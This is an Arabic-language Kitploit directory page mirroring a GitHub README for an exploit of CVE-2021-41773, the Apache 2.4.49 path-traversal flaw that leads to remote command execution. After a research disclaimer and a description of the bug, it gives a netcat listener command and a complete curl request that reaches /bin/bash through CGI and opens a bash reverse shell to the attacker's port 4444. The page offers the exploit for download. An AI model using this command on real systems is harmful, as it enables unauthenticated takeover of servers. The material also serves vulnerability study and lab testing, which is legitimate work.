Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-41773-Apache_2.4.49-Path-traversal-to-RCE | Kitploit
أدوات/GitHubGitHub/cyberquestor-infosec/cve-2021-41773-apache_2.4.49-path-traversal-to-rce
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubcyberquestor-infosec/cve-2021-41773-apache_2.4.49-path-traversal-to-rce

CVE-2021-41773-Apache_2.4.49-Path-traversal-to-RCE

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
2منذ سنة واحدةلم تتم المراجعة بعد

CVE-2021-41773 – Apache HTTP Server 2.4.49 تنفيذ الأوامر عن بُعد

⚠️ إخلاء مسؤولية
هذا المستودع مخصص لأغراض تعليمية وبحثية فقط.
يمكن استخدام المعلومات والكود المقدم هنا في بيئات خاضعة للتحكم، مثل أجهزة المختبرات الخاصة.
الاستخدام غير المصرح به لهذا الكود ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها غير قانوني وغير أخلاقي.
المؤلف غير مسؤول عن أي إساءة استخدام أو أضرار ناتجة.


🔍 حول الثغرة الأمنية

CVE-2021-41773 تؤثر على خادم Apache HTTP Server الإصدار 2.4.49.
بسبب التحقق غير الصحيح من المدخلات في عملية تطبيع المسارات، يمكن للمهاجم استغلال ثغرة اجتياز المسار باستخدام أحرف مشفرة مثل %2e للوصول إلى ملفات عشوائية.
إذا كان CGI مفعّلاً، يمكن تصعيد هذه الثغرة إلى تنفيذ أوامر عن بُعد بدون مصادقة (RCE).

  • نوع الثغرة: اجتياز المسار إلى تنفيذ أوامر عن بُعد
  • الإصدار المتأثر: Apache 2.4.49
  • المصادقة المطلوبة: ❌ لا
  • الخطورة: حرجة
  • درجة CVSS: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

🧾 المراجع

  • استشارة Apache الأمنية
  • Exploit-DB – 50383
  • GitHub PoC
  • تقرير NVD CVE

🛠 نظرة عامة على الاستغلال

يتم إنشاء طلب curl خبيث لاستغلال ثغرة اجتياز المسار. عندما يكون CGI مفعّلاً، يمكن للمهاجمين الوصول إلى /bin/bash وتنفيذ أوامر شل عشوائية.
في هذا المثال، يتم إرسال حمولة شل عكسية للحصول على وصول شل من الخادم.


💥 العرض العملي

تم اختبار هذا الاستغلال في بيئة مختبر خاصة. فيما يلي الخطوات والنتائج.

1. اكتشاف إصدار Apache

حدد فحص Nmap الهدف الذي يعمل بنظام Apache/2.4.49.

Apache Version


2. تنفيذ الاستغلال

تم إرسال حمولة شل عكسية باستخدام أمر curl مُعد خصيصًا.

Exploit Execution


3. استلام الشل العكسي

تم الحصول على شل عكسي بنجاح على جهاز المستمع الخاص بالمهاجم.

Reverse Shell


📂 استخدام الاستغلال

الخطوة 1: تشغيل مستمع Netcat

root@kitploit:~
nc -nvlp 4444

الخطوة 1: تشغيل الاستغلال

root@kitploit:~
curl -v 'http://<target>:<port>/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash' -d 'echo Content-Type: text/plain; echo; bash -i >& /dev/tcp/<your-ip>/4444 0>&1' -H 'Content-Type: text/plain'

✔️ تأكد من:

أن إصدار Apache هو 2.4.49

أن CGI مفعّل

أن المنفذ 4444 (أو المنفذ الذي اخترته) مفتوح عبر جدار الحماية

📖 مدونة Medium

اطّلع على الشرح التفصيلي والنظرية في مقالتي على Medium:
👉 اقرأ المدونة على Medium

تنزيل الأداة